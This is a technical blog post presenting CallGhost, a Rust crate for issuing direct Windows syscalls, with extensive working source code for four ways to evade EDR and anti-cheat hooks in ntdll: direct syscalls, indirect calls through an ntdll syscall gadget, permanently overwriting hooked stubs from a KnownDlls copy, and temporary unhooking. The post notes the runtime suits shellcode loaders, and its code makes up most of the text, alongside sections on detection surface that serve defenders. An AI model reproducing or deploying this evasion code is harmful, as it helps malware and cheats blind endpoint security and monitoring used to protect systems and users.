CallGhost: Direct Syscalls from Rust with Four Bypass Methods

This post covers CallGhost, a Rust crate that provides direct syscall invocation on Windows x86_64. The framework bypasses usermode API hooks placed by EDR products and anti-cheat software by avoiding ntdll function stubs entirely or by restoring them from clean copies. It exposes a single syscall! macro that hashes function names at compile time, resolves syscall numbers (SSNs) at runtime via Halo’s Gate, and emits one of four inline assembly sequences depending on the chosen method.

Why Bypass ntdll Stubs

Every usermode Windows API call eventually passes through ntdll.dll. When a process calls NtAllocateVirtualMemory, execution flows through the ntdll export, which loads the syscall number into eax, moves rcx to r10, and executes the syscall instruction. The kernel reads the syscall number from eax and dispatches the request.

EDR products and anti-cheat engines hook these ntdll stubs. They overwrite the first bytes of each function with a jmp to their own handler, which inspects the arguments, logs the call, and decides whether to allow it [1]. The actual API call still works, but the hooking agent sees everything that passes through ntdll.

Direct syscalls skip the ntdll stub entirely. The calling code loads the syscall number into eax and executes syscall from its own module. The kernel does not care where the instruction executes; it only reads eax for the syscall number and the registers for the arguments [2]. The hook never runs because execution never reaches ntdll. For context on how hooking frameworks like MinHook intercept API calls at the stub level (the exact mechanism that direct syscalls bypass), see the MinHook API interception post.

The problem is that the syscall number is not stable across Windows versions [3]. A function that uses SSN 0x18 on Windows 10 21H2 might use 0x19 on 22H2. Hardcoding SSNs breaks portability. CallGhost solves this by resolving SSNs at runtime from the ntdll export table, even when the stubs are hooked.

The Three Crates

CallGhost is a workspace of three crates:

  • callghost (facade): Re-exports the syscall! macro and exposes the runtime via a __private module.
  • callghost-macros (proc macro): Parses the macro invocation at compile time, hashes the function name, and generates method-specific Rust code with inline assembly.
  • callghost-runtime (no_std): PEB walking, export table parsing, SSN resolution, SSN caching, gadget finding, and all unhooking infrastructure. Zero dependencies beyond core.
// From: src/lib.rs
pub use callghost_macros::syscall;

#[doc(hidden)]
pub mod __private {
    pub use callghost_runtime::*;
}

The no_std runtime means CallGhost works in shellcode loaders and other environments where the C runtime is not available. The only requirement is that ntdll.dll is loaded in the process (which is always true on Windows, since the loader itself lives in ntdll).

The syscall! Macro

The user-facing API is a single macro:

// NtAllocateVirtualMemory with 6 arguments, direct method (default)
let status = syscall!(NtAllocateVirtualMemory, -1isize,
    &mut base, 0usize, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Same call, indirect method
let status = syscall!(indirect, NtAllocateVirtualMemory, -1isize,
    &mut base, 0usize, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

The macro accepts an optional method keyword (direct, indirect, unhook, perunsfart), a function name as a bare identifier, and up to 12 arguments. If no method is specified, it defaults to direct.

The proc macro in callghost-macros parses this input and dispatches to a method-specific code generator:

// From: callghost-macros/src/lib.rs
#[proc_macro]
pub fn syscall(input: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(input as SyscallInput);
    let method = input.method.as_deref().unwrap_or("direct");
    let fn_name_str = input.fn_name.to_string();
    let fn_name_bytes = proc_macro2::Literal::byte_string(fn_name_str.as_bytes());
    let num_args = input.args.len();

    if num_args > 12 {
        return syn::Error::new_spanned(&input.fn_name, "callghost: max 12 arguments")
            .to_compile_error().into();
    }

    match method {
        "direct" => gen_direct(&input.args, num_args, &fn_name_bytes),
        "indirect" => gen_indirect(&input.args, num_args, &fn_name_bytes),
        "unhook" => gen_unhook(&input.args, num_args, &fn_name_bytes),
        "perunsfart" => gen_perunsfart(&input.args, num_args, &fn_name_bytes),
        _ => syn::Error::new_spanned(&input.fn_name, "unknown method")
            .to_compile_error().into(),
    }
}

The function name is hashed at compile time using FNV-1a. No string containing "NtAllocateVirtualMemory" appears in the final binary.

Compile-Time Hashing with FNV-1a

Every function name is converted to a 32-bit FNV-1a hash before any runtime work happens. The hash function is const, so the Rust compiler evaluates it during compilation:

// From: callghost-runtime/src/lib.rs
pub const fn fnv1a(name: &[u8]) -> u32 {
    let mut hash: u32 = 0x811c9dc5;
    let mut i = 0;
    while i < name.len() {
        hash ^= name[i] as u32;
        hash = hash.wrapping_mul(0x01000193);
        i += 1;
    }
    hash
}

The generated code for each syscall! invocation includes a const binding:

// Generated by the macro at compile time
const __CG_HASH: u32 = ::callghost::__private::fnv1a(b"NtAllocateVirtualMemory");

FNV-1a is a non-cryptographic hash with good distribution and minimal collision rate for short inputs [4]. It is widely used in syscall frameworks because it is trivial to implement without dependencies. The 32-bit output is sufficient for the ~460 Nt/Zw exports in ntdll.

PEB Walking and ntdll Discovery

Before any syscall can be issued, the runtime needs the base address of ntdll.dll. CallGhost finds it by walking the Process Environment Block (PEB) [5], which is accessible from the GS segment register on x86_64:

// From: callghost-runtime/src/lib.rs
#[cfg(all(target_os = "windows", target_arch = "x86_64"))]
unsafe fn get_peb() -> *mut u8 {
    let peb: *mut u8;
    unsafe { asm!("mov {}, gs:[0x60]", out(reg) peb, options(nostack, nomem, preserves_flags)); }
    peb
}

The PEB is at gs:[0x60] on 64-bit Windows. At offset 0x18 from the PEB sits the PEB_LDR_DATA structure, and at offset 0x20 from there is the InMemoryOrderModuleList, a doubly-linked list of LDR_DATA_TABLE_ENTRY structures [5]. The walker iterates this list and compares each module’s BaseDllName against "ntdll.dll" using case-insensitive ASCII-to-Unicode comparison:

// From: callghost-runtime/src/lib.rs
fn ascii_eq_unicode_ci(ascii: &[u8], unicode: &[u16]) -> bool {
    if ascii.len() != unicode.len() { return false; }
    let mut i = 0;
    while i < ascii.len() {
        let a = if ascii[i] >= b'A' && ascii[i] <= b'Z' { ascii[i] + 32 } else { ascii[i] };
        let u = if unicode[i] >= b'A' as u16 && unicode[i] <= b'Z' as u16 { unicode[i] + 32 } else { unicode[i] };
        if a as u16 != u { return false; }
        i += 1;
    }
    true
}

The base address is cached in an AtomicPtr after the first lookup. Subsequent calls return the cached value without re-walking the PEB.

SSN Resolution: Clean Stubs and Halo’s Gate

Once ntdll’s base address is known, the runtime parses its PE export table to find the target function. It then attempts to extract the SSN directly from the stub bytes. A clean (unhooked) ntdll stub begins with mov r10, rcx; mov eax, <SSN>:

// From: callghost-runtime/src/lib.rs
unsafe fn extract_ssn_clean(stub: *const u8) -> Option<u16> {
    unsafe {
        if *stub == 0x4c && *stub.add(1) == 0x8b && *stub.add(2) == 0xd1 && *stub.add(3) == 0xb8 {
            return Some(*(stub.add(4) as *const u16));
        }
    }
    None
}

The byte sequence 4C 8B D1 B8 corresponds to mov r10, rcx followed by mov eax, imm32. The SSN is the 16-bit value at offset 4. If these bytes are present, the stub is clean and the SSN is read directly.

If the stub is hooked (the first bytes have been overwritten with a jmp), the clean extraction fails. This is where Halo’s Gate comes in [6]. The key insight is that SSNs are assigned sequentially: the Nt/Zw functions in ntdll are ordered by their RVA, and the syscall number increases by 1 for each function. If the target stub is hooked but a neighboring stub is clean, the target’s SSN can be calculated by addition or subtraction.

The resolver collects all Nt/Zw exports (identified by name prefix), sorts them by RVA, and then looks up and down from the target’s position:

// From: callghost-runtime/src/lib.rs
for d in 1..=12usize {
    if target_pos >= d {
        let p = unsafe { base.add(stubs[target_pos - d].rva as usize) };
        if let Some(ssn) = unsafe { extract_ssn_clean(p) } { return Some(ssn + d as u16); }
    }
    if target_pos + d < deduped {
        let p = unsafe { base.add(stubs[target_pos + d].rva as usize) };
        if let Some(ssn) = unsafe { extract_ssn_clean(p) } { return Some(ssn - d as u16); }
    }
}

If the stub 3 positions below has a clean SSN of 0x24, the target’s SSN is 0x24 + 3 = 0x27. The search radius of 12 is sufficient for any realistic hooking scenario; an EDR that hooks more than 12 consecutive Nt functions in address order would be unusual.

Resolved SSNs are stored in a direct-mapped cache (256 entries, keyed by hash). Collisions overwrite silently, causing at most one re-resolve:

// From: callghost-runtime/src/lib.rs
const SSN_CACHE_SIZE: usize = 256;
static mut SSN_CACHE: [u64; SSN_CACHE_SIZE] = [0u64; SSN_CACHE_SIZE];

fn ssn_pack(hash: u32, ssn: u16) -> u64 {
    ((hash as u64) << 32) | (ssn as u64) | 0x10000
}

fn ssn_lookup(hash: u32) -> Option<u16> {
    let idx = (hash as usize) % SSN_CACHE_SIZE;
    let entry = unsafe { core::ptr::read_volatile(&SSN_CACHE[idx]) };
    let stored_hash = (entry >> 32) as u32;
    if stored_hash == hash && (entry & 0x10000) != 0 {
        Some(entry as u16)
    } else {
        None
    }
}

Each cache entry packs the 32-bit hash and 16-bit SSN into a single u64 with a valid flag at bit 16. Atomic-width writes on x86_64 guarantee that a reader never sees a torn entry.

Method 1: Direct Syscall

The direct method is the simplest. It loads the SSN into eax, moves rcx to r10 (the Windows syscall ABI requires the first argument in both rcx and r10 [2]), and executes syscall:

// From: callghost-runtime/src/lib.rs
unsafe fn raw_syscall(ssn: u16, a0: u64, a1: u64, a2: u64, a3: u64) -> i32 {
    let result: u64;
    unsafe {
        asm!(
            "mov r10, rcx", "mov eax, {ssn:e}", "syscall",
            ssn = inlateout(reg) ssn as u64 => _,
            inlateout("rcx") a0 => _, inlateout("rdx") a1 => _,
            inlateout("r8") a2 => _, inlateout("r9") a3 => _,
            lateout("rax") result, lateout("r10") _, lateout("r11") _,
            options(nostack),
        );
    }
    result as i32
}

For calls with more than 4 arguments, the macro generates stack setup code. The x64 calling convention places the first 4 arguments in rcx, rdx, r8, r9; additional arguments go on the stack at [rsp+0x28] and above [7]. The extra arguments are collected into a stack buffer, then copied to their stack slots via a single temporary register. This avoids consuming one register per extra argument, which would exhaust the available registers for high-argument-count syscalls like NtCreateFile (11 arguments):

// From: callghost-macros/src/lib.rs
fn gen_direct_stack_asm(ids: &[Ident], n: usize) -> proc_macro2::TokenStream {
    let extra = n - 4;
    let ss = (0x28 + extra * 8 + 15) & !15;
    let sub = format!("sub rsp, 0x{:x}", ss);
    let add = format!("add rsp, 0x{:x}", ss);
    let copy_lines: Vec<String> = (0..extra).flat_map(|i| vec![
        format!("mov {{__cg_tmp}}, [{{__cg_buf}}+{}]", i * 8),
        format!("mov [rsp+0x{:x}], {{__cg_tmp}}", 0x28 + i * 8),
    ]).collect();
    let eids: Vec<&Ident> = (0..extra).map(|i| &ids[i + 4]).collect();
    let extra_lit = proc_macro2::Literal::usize_unsuffixed(extra);
    // ...
    quote! {
        let __cg_stack_buf: [u64; #extra_lit] = [#(#eids),*];
        core::arch::asm!(
            #sub, #(#copy_lines,)* "mov r10, rcx", "mov eax, {__cg_ssn:e}", "syscall", #add,
            __cg_ssn = inlateout(reg) __cg_ssn as u64 => _,
            __cg_buf = inlateout(reg) __cg_stack_buf.as_ptr() as u64 => _,
            __cg_tmp = out(reg) _,
            // ... register args and clobbers
        );
    }
}

The buffer approach uses only two extra registers (__cg_buf for the array pointer and __cg_tmp for the copy loop) regardless of how many stack arguments exist. The stack frame size is aligned to 16 bytes as required by the x64 ABI. The 0x28 base offset accounts for the 32-byte shadow space plus the 8-byte return address.

Detection surface: The syscall instruction executes inside the calling module, not in ntdll. Any EDR that checks the return address will see it pointing to the caller’s .text section rather than ntdll. This is the main weakness of the direct method.

Method 2: Indirect Syscall via ntdll Gadget

The indirect method addresses the return address problem. Instead of executing syscall directly, it calls into a syscall; ret gadget found inside ntdll’s .text section. The return address on the stack points back to ntdll, which looks legitimate to callstack validation [8].

The gadget finder scans ntdll’s .text section for the byte sequence 0F 05 C3 (syscall; ret):

// From: callghost-runtime/src/lib.rs
for i in 0..size.saturating_sub(2) {
    let p = unsafe { text.add(i) };
    if unsafe { *p == 0x0F && *p.add(1) == 0x05 && *p.add(2) == 0xC3 } {
        GADGET.store(p, Ordering::Relaxed);
        return p;
    }
}

The .text section is located by walking the PE section headers and comparing names:

// From: callghost-runtime/src/lib.rs
unsafe fn find_text_section(base: *mut u8) -> Option<(*mut u8, usize)> {
    // ... parse section headers
    for i in 0..num_sec as usize {
        let sec = unsafe { first.add(i * 40) };
        let name = unsafe { core::slice::from_raw_parts(sec, 5) };
        if name == b".text" {
            let vsize = unsafe { *(sec.add(8) as *const u32) } as usize;
            let vaddr = unsafe { *(sec.add(12) as *const u32) } as usize;
            return Some((unsafe { base.add(vaddr) }, vsize));
        }
    }
    None
}

The gadget address is cached in an AtomicPtr. The indirect assembly uses call instead of syscall, which pushes a return address pointing into ntdll:

// Generated by macro for indirect ≤4 args
core::arch::asm!(
    "mov r10, rcx", "mov eax, {ssn:e}", "call {gadget}",
    ssn = inlateout(reg) __cg_ssn as u64 => _,
    gadget = inlateout(reg) __cg_gadget as u64 => _,
    // ...
);

For stack arguments, the indirect method uses a base offset of 0x20 instead of 0x28. The call instruction itself pushes 8 bytes (the return address), so the kernel sees the 5th argument at [rsp+0x28] as expected.

Detection surface: The return address now points into ntdll, which passes simple callstack checks. However, the gadget address is not the start of any exported function. A defender walking the callstack and verifying that return addresses correspond to known function entry points (rather than arbitrary code locations) could detect this. For a detailed look at how callstack validation detects these patterns, see the Peregrine callstack validation post.

Method 3: Permanent Unhook from KnownDlls

The unhook method takes a different approach: instead of avoiding the stub, it restores the hooked stub to its original bytes before executing through it. The clean bytes come from a fresh mapping of ntdll obtained via the KnownDlls object directory [9].

KnownDlls is a Windows mechanism that pre-maps common system DLLs into a shared section. The path \KnownDlls\ntdll.dll points to the kernel’s cached, unmodified copy. The runtime maps it via NtOpenSection and NtMapViewOfSection, both of which are themselves invoked via direct syscalls (bootstrapping with whatever SSN resolution is available):

// From: callghost-runtime/src/lib.rs
const KNOWN_DLLS_PATH: [u16; 20] = [
    b'\\' as u16, b'K' as u16, b'n' as u16, b'o' as u16, b'w' as u16,
    b'n' as u16, b'D' as u16, b'l' as u16, b'l' as u16, b's' as u16,
    b'\\' as u16, b'n' as u16, b't' as u16, b'd' as u16, b'l' as u16,
    b'l' as u16, b'.' as u16, b'd' as u16, b'l' as u16, b'l' as u16,
];

The path is stored as a u16 array (UTF-16) to construct the UNICODE_STRING structure that NT APIs expect. No string conversion at runtime, no allocator dependency.

The unhook operation copies 32 bytes from the clean mapping over the hooked stub, temporarily making the page writable via NtProtectVirtualMemory:

// From: callghost-runtime/src/lib.rs
unsafe fn copy_clean_bytes(hooked_stub: *mut u8, hash: u32, len: usize) {
    let clean = unsafe { get_clean_ntdll() };
    let dir = unsafe { get_export_dir(clean) }.expect("callghost: clean ntdll exports");
    let rva = unsafe { resolve_export_rva(clean, dir, hash) }.expect("callghost: fn not in clean ntdll");
    let src = unsafe { clean.add(rva as usize) };
    let old = unsafe { protect_mem(hooked_stub, len, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(src, hooked_stub, len) };
    unsafe { protect_mem(hooked_stub, len, old) };
}

After the copy, the stub is permanently restored. The macro-generated code for the unhook method calls unhook_stub before resolving the SSN and issuing a direct syscall:

// Generated by macro for unhook method
const __CG_HASH: u32 = ::callghost::__private::fnv1a(b"NtQueryInformationProcess");
unsafe { ::callghost::__private::unhook_stub(__CG_HASH) };
let __cg_ssn: u16 = unsafe { ::callghost::__private::get_ssn(__CG_HASH) };
// ... direct syscall assembly

There is also an unhook_all function that restores the entire .text section of ntdll in a single copy:

// From: callghost-runtime/src/lib.rs
pub unsafe fn unhook_all() {
    let base = unsafe { get_ntdll_base() };
    let clean = unsafe { get_clean_ntdll() };
    let (text, tsize) = unsafe { find_text_section(base) }.expect("callghost: .text not found");
    let (ctxt, csize) = unsafe { find_text_section(clean) }.expect("callghost: .text not found in clean");
    let n = tsize.min(csize);
    let old = unsafe { protect_mem(text, n, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(ctxt, text, n) };
    unsafe { protect_mem(text, n, old) };
}

Detection surface: The hooks are gone. If the EDR re-scans its hooks (periodic integrity checks), it will notice they have been removed. The NtProtectVirtualMemory call to make .text writable is also suspicious; page protection changes on ntdll are a strong signal.

Method 4: Perun’s Fart (Temporary Unhook)

Perun’s Fart [10] combines the clean-stub approach with stealth: it restores the hooked bytes after the call completes. The stub is clean only for the duration of a single function invocation.

The prepare step saves the current (hooked) bytes and overwrites them with clean ones:

// From: callghost-runtime/src/lib.rs
pub unsafe fn perunsfart_prepare(hash: u32) -> PerunState {
    let stub = unsafe { get_function_address(hash) };
    let mut saved = [0u8; STUB_SIZE];
    unsafe { core::ptr::copy_nonoverlapping(stub, saved.as_mut_ptr(), STUB_SIZE) };
    unsafe { copy_clean_bytes(stub, hash, STUB_SIZE) };
    PerunState { stub, saved }
}

The macro generates code that calls the now-clean stub via a function pointer transmute, then restores the hooked bytes:

// Generated by macro for perunsfart method
let __cg_state = unsafe { ::callghost::__private::perunsfart_prepare(__CG_HASH) };
// ... argument bindings
let __cg_ret: i32 = unsafe {
    let __cg_fn: unsafe extern "system" fn(u64, u64, u64, u64, u64) -> i32 =
        core::mem::transmute(__cg_state.stub);
    __cg_fn(__cg_a0, __cg_a1, __cg_a2, __cg_a3, __cg_a4)
};
unsafe { ::callghost::__private::perunsfart_restore(&__cg_state) };

The restore step copies the saved (hooked) bytes back:

// From: callghost-runtime/src/lib.rs
pub unsafe fn perunsfart_restore(state: &PerunState) {
    let old = unsafe { protect_mem(state.stub, STUB_SIZE, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(state.saved.as_ptr(), state.stub, STUB_SIZE) };
    unsafe { protect_mem(state.stub, STUB_SIZE, old) };
}

Detection surface: The hooks survive. An EDR checking its hook integrity after the call will see them intact. However, the two NtProtectVirtualMemory calls (one to make writable, one to restore protection) per invocation are detectable. The window during which the stub is clean is also a TOCTOU gap: a concurrent thread could call the same function during that window and bypass the hook unintentionally.

The SyscallParam Trait

The syscall! macro needs to convert arbitrary Rust types to u64 values for the register/stack arguments. The SyscallParam trait provides this conversion:

// From: callghost-runtime/src/lib.rs
pub trait SyscallParam {
    fn to_u64(self) -> u64;
}

impl SyscallParam for u32 { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for usize { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for i32 { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for isize { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for bool { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for *mut T { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for *const T { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for &T { fn to_u64(self) -> u64 { self as *const T as u64 } }
impl<T> SyscallParam for &mut T { fn to_u64(self) -> u64 { self as *mut T as u64 } }

This means callers can pass &mut handle, 0usize, -1isize, or raw pointers directly. The trait handles the conversion, and the macro generates the binding:

// Generated by macro
let __cg_a0: u64 = (-1isize).to_u64();
let __cg_a1: u64 = (&mut base).to_u64();

Arguments are always padded to at least 4 (the register count), with unused slots set to zero.

Test Suite: 23 Tests with Hook Verification and Real File I/O

The test suite in tests/smoke.rs covers hash consistency, SSN resolution, gadget verification, all four bypass methods against real inline hooks, and real-impact file creation via NtCreateFile. The tests require single-threaded execution (cargo test -- --test-threads=1) because the unhook methods modify shared ntdll memory.

The test infrastructure installs real inline hooks by overwriting stub bytes with mov eax, 0xDEAD0001; ret:

// From: tests/smoke.rs
unsafe fn install_inline_hook(stub: *mut u8) -> [u8; 6] {
    let mut saved = [0u8; 6];
    let hook: [u8; 6] = [0xB8, 0x01, 0x00, 0xAD, 0xDE, 0xC3];
    unsafe {
        core::ptr::copy_nonoverlapping(stub, saved.as_mut_ptr(), 6);
        core::ptr::copy_nonoverlapping(hook.as_ptr(), stub, 6);
    }
    saved
}

A HookGuard RAII wrapper manages hook installation and cleanup. It records the clean SSN before hooking and provides verify_hooked() and verify_clean() assertions.

The critical test is hook_itself_works, which proves that calling through a hooked stub actually returns the sentinel value 0xDEAD0001. Without this test, all bypass tests would pass vacuously if hook installation were broken:

// From: tests/smoke.rs
#[test]
fn hook_itself_works() {
    let guard = HookGuard::install(b"NtQueryInformationProcess");
    let hooked_fn: unsafe extern "system" fn(isize, u32, *mut u8, u32, *mut u32) -> i32 =
        unsafe { core::mem::transmute(guard.stub) };
    let mut info = [0u8; 48];
    let mut retlen: u32 = 0;
    let result = unsafe { hooked_fn(-1, 0, info.as_mut_ptr(), 48, &mut retlen) };
    assert_eq!(result as u32, HOOK_SENTINEL,
        "calling through hooked stub should return 0x{:08X}", HOOK_SENTINEL);
}

Each bypass method is then tested against the same hooked stub. The test asserts that the syscall succeeds (returns STATUS_SUCCESS, not 0xDEAD0001) and produces valid data. For the Perun’s Fart method, an additional assertion verifies the hook is still in place after the call.

Real-Impact Tests: NtCreateFile with 11 Arguments

The memory allocation tests prove that syscalls execute correctly, but they operate on anonymous memory that leaves no observable trace. The file creation tests go further: each method calls NtCreateFile with 11 arguments, creates a real file on disk, and verifies it exists using standard Rust std::fs:

// From: tests/smoke.rs
macro_rules! test_file_creation {
    ($test_name:ident, $method:ident, $suffix:expr) => {
        #[test]
        fn $test_name() {
            let path = temp_file_path($suffix);
            let _ = std::fs::remove_file(&path);

            let mut parts = NtFileParts::new(&path);
            let us = parts.unicode_string();
            let oa = NtObjectAttributes {
                length: core::mem::size_of::<NtObjectAttributes>() as u32,
                root_directory: core::ptr::null_mut(),
                object_name: &us,
                attributes: OBJ_CASE_INSENSITIVE,
                security_descriptor: core::ptr::null_mut(),
                security_quality_of_service: core::ptr::null_mut(),
            };
            let mut handle: isize = 0;
            let mut iosb = NtIoStatusBlock { status: 0, information: 0 };

            let status = syscall!($method, NtCreateFile,
                &mut handle,
                GENERIC_WRITE | SYNCHRONIZE_ACCESS,
                &oa,
                &mut iosb,
                core::ptr::null_mut::<u64>(),
                FILE_ATTRIBUTE_NORMAL,
                0u32,
                FILE_OVERWRITE_IF,
                FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
                core::ptr::null_mut::<u8>(),
                0u32
            );
            assert_eq!(status, 0,
                "[{}] NtCreateFile failed: 0x{:08X}", stringify!($method), status as u32);

            syscall!(NtClose, handle);
            verify_and_cleanup(&path, stringify!($method));
        }
    };
}

test_file_creation!(direct_creates_real_file, direct, "direct");
test_file_creation!(indirect_creates_real_file, indirect, "indirect");
test_file_creation!(unhook_creates_real_file, unhook, "unhook");
test_file_creation!(perunsfart_creates_real_file, perunsfart, "perunsfart");

NtCreateFile takes 11 arguments: a handle pointer, desired access, object attributes, I/O status block, allocation size, file attributes, share access, create disposition, create options, EA buffer, and EA length [11]. This exercises the buffer-based stack argument handling with 7 extra arguments beyond the 4 register slots. The verify_and_cleanup helper uses std::fs::metadata to confirm the file exists as a regular file, then deletes it. This proves the syscall had a real, observable side effect that persists beyond the process’s address space.

Limitations and Detection Surface

Return address anomaly (direct method). The syscall instruction executes from the caller’s module, not ntdll. EDR products that validate the return address of syscall instructions against known ntdll stub locations will flag this [8]. The indirect method mitigates this specific check but introduces a different signature (gadget reuse).

NtProtectVirtualMemory calls (unhook and perunsfart). Both unhooking methods must temporarily make ntdll’s .text section writable. This PAGE_EXECUTE_READWRITE transition on ntdll memory is a strong IOC. Some EDR products hook NtProtectVirtualMemory specifically to detect this.

Not thread-safe for unhook/perunsfart. The unhook and Perun’s Fart methods modify shared ntdll memory. If two threads call perunsfart_prepare on the same stub concurrently, one thread’s restore may overwrite the other’s clean bytes. The test suite requires single-threaded execution for this reason.

FNV-1a collision risk. The 32-bit hash space means collisions are theoretically possible across ~460 Nt exports. In practice, FNV-1a produces no collisions for the ntdll export set, but the framework does not verify this at runtime. A collision would cause the wrong SSN to be returned.

SSN cache is process-wide and mutable. The cache uses static mut with write_volatile/read_volatile. This is correct on x86_64 (naturally aligned 8-byte writes are atomic), but it is technically undefined behavior in Rust’s memory model. A future compiler optimization could in theory break the volatile ordering.

KnownDlls mapping is not cleaned up automatically. The clean ntdll mapping persists until release_clean_ntdll() is called explicitly. A forensic analyst examining the process’s section handles will see an extra mapping of ntdll from \KnownDlls\, which is unusual for normal applications.

Drafted with LLM assistance from the CallGhost source code, reviewed and verified against the actual implementation.

References

[1] Elastic Security Labs, “Hooking Techniques in Endpoint Detection”, elastic.co

[2] Microsoft, “x64 ABI conventions: System calls”, learn.microsoft.com

[3] j00ru, “Windows X86-64 System Call Table”, j00ru.vexillium.org

[4] Fowler, Noll, Vo, “FNV Hash”, isthe.com/chongo/tech/comp/fnv

[5] Microsoft, “PEB structure”, learn.microsoft.com

[6] am0nsec, smelly__vx, “Halo’s Gate: Dynamically Resolving Syscall Numbers”, vxunderground.org

[7] Microsoft, “x64 calling convention”, learn.microsoft.com

[8] Elastic Security Labs, “Call Stack Spoofing”, elastic.co

[9] Microsoft, “KnownDLLs Registry Key”, learn.microsoft.com

[10] d0ntrash, “Perun’s Fart”, github.com/d0ntrash

[11] Microsoft, “NtCreateFile function”, learn.microsoft.com